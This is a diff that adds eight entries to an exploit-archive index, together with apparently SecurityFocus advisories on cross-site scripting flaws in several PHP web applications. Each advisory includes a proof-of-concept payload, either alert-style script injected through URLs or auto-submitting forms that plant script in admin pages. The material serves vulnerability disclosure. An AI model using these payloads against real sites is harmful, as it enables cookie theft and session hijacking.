Updated 08_13_2014

files.csv

@@ -30910,3 +30910,11 @@ id,file,description,date,author,platform,type,port
 34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
 34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
 34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance 'welcome.cgi' Cross Site Scripting Vulnerability",2010-06-09,"Richard Brain",hardware,remote,0
+34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 '228-recherche.php' Cross Site Scripting Vulnerability",2009-12-13,loneferret,php,webapps,0
+34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 Cross Site Scripting and Authentication Bypass Vulnerabilities",2009-12-13,bi0,php,webapps,0
+34319,platforms/php/webapps/34319.txt,"Ez Cart 'index.php' Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0
+34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 admin/template/error_checking.php Multiple Parameter XSS",2010-07-15,Leonard,php,webapps,0
+34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-07-15,"Nijel the Destroyer",php,webapps,0
+34322,platforms/php/webapps/34322.txt,"phpwcms <= 1.4.5 'phpwcms.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
+34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 'modmenu.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
+34324,platforms/php/webapps/34324.txt,"FestOS 2.3 'contents' Parameter Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0

platforms/php/webapps/34317.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/41686/info
+
+Automne is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Automne version 4.0.0rc2 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/web/fr/228-recherche.php?q=<input type="Submit" name="Delete" value="ClickMe"onClick="alert(1)"> 

platforms/php/webapps/34318.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/41689/info
+
+
+Zeecareers is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities.
+
+An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The attacker may leverage the authentication-bypass issues to access information without proper authentication.
+
+Zeecareers version 2.0 is vulnerable; other versions may also be affected. 
+
+The following example URI is available:
+
+http://www.example.com/basic_search_result.php?title=[XSS] 

platforms/php/webapps/34319.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/41696/info
+
+Ez Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+
+The following example URI is available:
+
+http://www.example.com/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script> 

platforms/php/webapps/34320.txt

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/41697/info
+
+GetSimple CMS is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, an HTML-injection vulnerability, and a directory-traversal vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to retrieve and possibly execute arbitrary files through the use of directory-traversal strings, to obtain potentially sensitive information, or to execute arbitrary local scripts in the context of the webserver process.
+
+GetSimple CMS 2.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/admin/template/error_checking.php?upd=bak-success&i18n[ER_BAKUP_DELETED]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ER_REQ_PROC_FAIL]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ERROR]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=edit&i18n[ER_YOUR_CHANGES]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=restore&i18n[ER_HASBEEN_REST]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[ER_HASBEEN_DEL]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[UNDO]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=edit-index&i18n[ER_CANNOT_INDEX]=[XSS]
+http://www.example.com/admin/template/error_checking.php?restored=true&i18n[ER_OLD_RESTORED]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=pwd-success&i18n[ER_NEW_PWD_SENT]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=pwd-error&i18n[ER_SENDMAIL_ERR]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=del-success&i18n[ER_FILE_DEL_SUC]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=del-error&i18n[ER_PROBLEM_DEL]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=comp-success&i18n[ER_COMPONENT_SAVE]=[XSS]
+http://www.example.com/admin/template/error_checking.php?upd=comp-restored&i18n[ER_COMPONENT_REST]=[XSS]
+http://www.example.com/admin/template/error_checking.php?cancel=test&i18n[ER_CANCELLED_FAIL]=[XSS]
+http://www.example.com/admin/template/error_checking.php?err=true&msg=[XSS] 

platforms/php/webapps/34321.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41701/info
+
+Spitfire is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.
+
+An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. Other attacks may also be possible.
+
+Spitfire 1.0.381 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cont_index.php?cms_id=PAGE_ID&search=1"><script>alert(document.cookie)</script>

platforms/php/webapps/34322.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41720/info
+
+phpwcms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+phpwcms 1.4.5 is vulnerable; other versions may also be affected. 
+
+http:/www.example.com/phpwcms.php?do=modules&module=calendar&calendardate=8-2010%22+onmouseover=alert%2834%29+style=position:absolute;width:100%;height:100%;left:0;top:0;+%22

platforms/php/webapps/34323.html

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/41724/info
+
+DSite CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+DSite CMS 4.81 is vulnerable; prior versions may also be affected. 
+
+<form action="http://www.example.com/admin/plugin.php?menu_id=1&module=menu&plitem=modmenu.php" method="post" name="main" >
+<input type="hidden" name="module" value="menu" />
+<input type="hidden" name="plitem" value="modmenu.php" />
+<input type="hidden" name="menu_id" value="1" />
+<input type="hidden" name="button_name" value='bn"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="new_make" value="YES" />
+</form>
+<script>
+document.main.submit();
+</script>

platforms/php/webapps/34324.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41725/info
+
+FestOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+FestOS version 2.3b is vulnerable; other versions may also be affected.
+
+<form action="http://www.example.com/admin/do_snippets_edit.php?tabname=Pages" method="post" name="main" > <input type="hidden" name="snippetID" value="1" /> <input type="hidden" name="title" value="Site footer" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="contents" value='footer"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script>